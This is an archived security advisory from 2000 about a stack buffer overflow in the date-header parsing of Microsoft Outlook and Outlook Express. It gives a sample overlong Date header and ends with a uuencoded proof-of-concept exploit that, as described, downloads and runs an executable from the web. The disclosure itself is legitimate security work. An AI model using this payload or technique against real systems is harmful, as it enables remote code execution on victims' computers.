what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

outlook.advisory.txt

outlook.advisory.txt
Posted Jul 19, 2000
Authored by Aaron Drew

Microsoft Outlook Advisory and Remote Exploit - A bug in a shared component of Microsoft Outlook and Outlook Express mail clients can allow a remote user to write arbitrary data to the stack. This bug has been found to exist in all versions of MS Outlook and Outlook Express on both Windows 95/98 and Windows NT 4. Includes in depth discussion and proof-of-point exploit that, when placed in the header field of a message or MIME attached message, will download and execute an executable from the web.

tags | exploit, remote, web, arbitrary
systems | windows
SHA-256 | 924dc94a7e9e122649116ef845008adf1d26be73434d2b03a7a0aebee8190822

outlook.advisory.txt

Change Mirror Download
_______________________________________________________________

Security Advisory: Buffer Overflow in MS Outlook & Outlook Express Email Clients

Date: 18th July 2000
Author: Aaron Drew (mailto:ripper@wollongong.hotkey.net.au)
Versions Affected: MS Outlook 97/2000 and MS Outlook Express 4/5

_______________________________________________________________

A bug in a shared component of Microsoft Outlook and Outlook Express mail
clients can allow a remote user to write arbitrary data to the stack. This
bug has been found to exist in all versions of MS Outlook and Outlook
Express on both Windows 95/98 and Windows NT 4.

The vulnerability lies in the parsing of the GMT section of the date field
in the header of an email. Bound checking on the token representing the GMT
is not properly handled. This bug can be witnessed by opening an email with
an exceptionally long string directly preceding the GMT specification in
the Date header field such as:

Date: Fri, 13 July 2000 14:16:06 +1000xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

The bug lies in the shared library INETCOMM.DLL and has been successfully
exploited on Windows 95, 98 and NT with both Outlook and Outlook Express.

The execution of this code is performed differently under each client. Under
Outlook Express, the buffer overflow occurs as soon as the user tries to
view the mail folder containing email with a malicious date header. Under
Microsoft Outlook, the overflow occurs when attempting to preview, read,
reply or forward any email with a malicious date header. Under MS Outlook a
user may delete or save an email to disk without exploitation.

Whilst some mail transport systems seem to modify 8-bit header data or lines
over 70 characters in length preventing direct exploitation, these
restrictions seem to be avoided by encoding a message with an exploit date
field as a MIME attachment in a Outlook's MIME attached message format.
These messages also overflow the stack when read, previewed, replied to or
forwarded.

Microsoft was notified of this bug on July 3.

Attached is a proof-of-point exploit that, when placed in the header
field of a message or MIME attached message, will download and execute
an executable from the web. (In this particular case it will launch MS Freecell)

_______________________________________________________________

DISCLAIMER

The information within this document may change without notice. Use of
this information constitutes acceptance for use in an AS IS
condition. There are NO warranties with regard to this information.
In no event shall the author be liable for any consequences whatsoever
arising out of or in connection with the use or spread of this
information. Any use of this information lays within the user's
responsibility.

_______________________________________________________________


begin 600 outlookex
M1&%T93H@4W5N+"`W($UA>2`R,#`P(#$Q.C(P.C0V("LQ,#`PD)"0D)"0D)"0
MD)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0-MW#
M7I"0D)"0D)"0`4#'7@7##("0D)"+Q"UQ_O__B^R0D)"0,\FQH4B`,(#B^I"+
MZ)"^F!+`7E!0_Q:+\(O=,^V0B_MF@>]__OPSR8#I^Y!#,L#7A,!U^$-14U;_
M%902P%ZK6>+J0S+`UX3`=?A#4_\5F!+`7HOP,\F#Z?Q#,L#7A,!U^$-14U;_
M%902P%ZK6>+JD#/`9DC1X)`STE!2_U?LB_`STE)24E)2_U?P,])24E)2B]>!
MPMS^__^04E#_5_A7,])F2M'B4E90_U?\D)"0,])2B]>!PO;^__]2_U?<_S=6
M4(O8_U?@4_]7Y)`STD)2B]>!PO;^__^04O]7Z%#_%:P1P%Z0D)"0D)"0D)"0
MD,O%TL[%S+.R@-_LX_+EX?2`W^SW\NGTY8#?[./L[_/E@-?I[L7XY>.`Q^SO
MXN'LP>SL[^.`U\G.R<[%U(#)[O3E\N[E],_PY>[!@,GN].7R[N7TP^SO\^7(
MX>[D[.6`R>[TY?+NY?3/\.7NU?+LP8#)[O3E\N[E]-+EX>3&Z>SE@.CT]/"Z
FKZ^QN;*NL;:XKK"PL:ZPL;"O].7S]*[E^.6`D)"0D)"0D)"0D`H`
`
end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close